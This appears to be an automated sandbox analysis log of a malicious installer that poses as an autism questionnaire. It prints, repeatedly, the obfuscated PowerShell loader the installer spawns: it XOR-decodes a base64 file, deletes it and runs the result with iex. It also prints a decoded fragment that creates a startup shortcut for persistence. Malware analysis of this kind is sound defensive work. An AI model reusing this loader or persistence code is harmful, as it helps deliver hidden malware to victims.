            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;Jump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --type=renderer /prefetch:1 "C:\Users\user\AppData\Roaming\736c2da134b4beaabac45d01943b266e.pdf
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=18138760929948388568 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=18138760929948388568 --renderer-client-id=2 --mojo-platform-channel-handle=1708 --allow-no-sandbox-job /prefetch:1
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --lang=en-US --gpu-preferences=KAAAAAAAAACAAwABAQAAAAAAAAAAAGAAAAAAAAEAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --service-request-channel-token=1964537546466602417 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=8469343885171470224 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=8469343885171470224 --renderer-client-id=4 --mojo-platform-channel-handle=1800 --allow-no-sandbox-job /prefetch:1
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=3770922529545536729 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=3770922529545536729 --renderer-client-id=5 --mojo-platform-channel-handle=1780 --allow-no-sandbox-job /prefetch:1
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --touch-events=enabled --field-trial-handle=1696,12314356314584288253,2936542180111071890,131072 --disable-features=VizDisplayCompositor --disable-gpu-compositing --service-pipe-token=15315623175826486505 --lang=en-US --disable-pack-loading --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.12.20035 Chrome/80.0.0.0" --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=15315623175826486505 --renderer-client-id=6 --mojo-platform-channel-handle=1720 --allow-no-sandbox-job /prefetch:1
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_004AF110
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_0060F6D8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,3_2_0060F6D8
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpFile created: C:\Users\user\AppData\Local\Programs
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeFile created: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp
            Source: classification engineClassification label: mal100.rans.evad.winEXE@39/179@0/1
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_0062CFB8 GetVersion,CoCreateInstance,3_2_0062CFB8
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpFile read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_0041A4DC GetDiskFreeSpaceW,0_2_0041A4DC
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3628:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6376:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6920:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6136:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6620:120:WilError_01
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004AF9F0 FindResourceW,SizeofResource,LoadResource,LockResource,0_2_004AF9F0
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeString found in binary or memory: Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file af
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeString found in binary or memory: /LOADINF="filename"
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeFile opened: C:\Windows\SysWOW64\Msftedit.dll
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeStatic file information: File size 103560224 > 1048576
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000E.00000003.383501871.00000000038C0000.00000004.00000001.sdmp
            Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000C.00000003.388759087.0000000007351000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000003.394460338.00000000038C4000.00000004.00000001.sdmp

            Data Obfuscation:

            Suspicious powershell command line found
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Obfuscated command line found
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2fc960fe1b6f90b5b7dea2742da4[$i]=$9c8a2fc960fe1b6f90b5b7dea2742da4[$i] -bxor $25bab4e4c09044d87ed4966010932848[$j];$i++;if($i -ge $9c8a2fc960fe1b6f90b5b7dea2742da4.count){$j=$25bab4e4c09044d87ed4966010932848.length}}};$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Text.Encoding]::UTF8.GetString($9c8a2fc960fe1b6f90b5b7dea2742da4);iex $9c8a2fc960fe1b6f90b5b7dea2742da4;
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp "C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp" /SL5="$1D025E,102634141,825344,C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe"
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004B5000 push 004B50DEh; ret 0_2_004B50D6
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004B5980 push 004B5A48h; ret 0_2_004B5A40
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00458000 push ecx; mov dword ptr [esp], ecx0_2_00458005
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_0049B03C push ecx; mov dword ptr [esp], edx0_2_0049B03D
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004A00F8 push ecx; mov dword ptr [esp], edx0_2_004A00F9
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00458084 push ecx; mov dword ptr [esp], ecx0_2_00458089
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004B1084 push 004B10ECh; ret 0_2_004B10E4
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004A1094 push ecx; mov dword ptr [esp], edx0_2_004A1095
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_0041A0B4 push ecx; mov dword ptr [esp], ecx0_2_0041A0B8
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004270BC push 00427104h; ret 0_2_004270FC
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00458108 push ecx; mov dword ptr [esp], ecx0_2_0045810D
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004321C8 push ecx; mov dword ptr [esp], edx0_2_004321C9
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004A21D8 push ecx; mov dword ptr [esp], edx0_2_004A21D9
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_0049E1B8 push ecx; mov dword ptr [esp], edx0_2_0049E1B9
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_0049A260 push 0049A378h; ret 0_2_0049A370
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00455268 push ecx; mov dword ptr [esp], ecx0_2_0045526C
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004252D4 push ecx; mov dword ptr [esp], eax0_2_004252D9
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004592FC push ecx; mov dword ptr [esp], edx0_2_004592FD
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_0045B284 push ecx; mov dword ptr [esp], edx0_2_0045B285
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00430358 push ecx; mov dword ptr [esp], eax0_2_00430359
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00430370 push ecx; mov dword ptr [esp], eax0_2_00430371
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00459394 push ecx; mov dword ptr [esp], ecx0_2_00459398
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004A1428 push ecx; mov dword ptr [esp], edx0_2_004A1429
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_0049B424 push ecx; mov dword ptr [esp], edx0_2_0049B425
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004A24D8 push ecx; mov dword ptr [esp], edx0_2_004A24D9
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004224F0 push 004225F4h; ret 0_2_004225EC
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004304F0 push ecx; mov dword ptr [esp], eax0_2_004304F1
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00499490 push ecx; mov dword ptr [esp], edx0_2_00499493
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00458564 push ecx; mov dword ptr [esp], edx0_2_00458565
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00458574 push ecx; mov dword ptr [esp], edx0_2_00458575
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00457574 push ecx; mov dword ptr [esp], ecx0_2_00457578
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeStatic PE information: section name: .didata
            Source: Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp.0.drStatic PE information: section name: .didata
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_setup64.tmp
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeFile created: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmp
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpFile created: C:\Users\user\AppData\Local\Temp\is-DU1EI.tmp\_isetup\_isdecmp.dll

            Boot Survival:

            Powershell creates an autostart link
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .LNK');$a7741f1884746d8b943a3d6a59b94.tArgEtPath=$a6d16d7f160467a9b0e6fddfb5351+'\'+$a4a15c2242e459a842faa1e057416;$a7741f1884746d8b943a3d6a59b94.windowStylE=7;$a7741f1884746d8b943a3d6a59b94.SavE();IEX $a58b687a5fe4d2a2db88334214fab; {[ChAR]$_} $_.PSParentPath.Replace("Microsoft.PowerShell.Core\FileSystem::", "") [String]::Format("{0,10} {1,8}", $_.LastWriteTime.ToString("d"), $_.LastWriteTime.ToString("t")) if ($_ -is [System.IO.DirectoryInfo]) { return '' }if ($_.Attributes -band [System.IO.FileAttributes]::Offline){ return '({0})' -f $_.Length}return 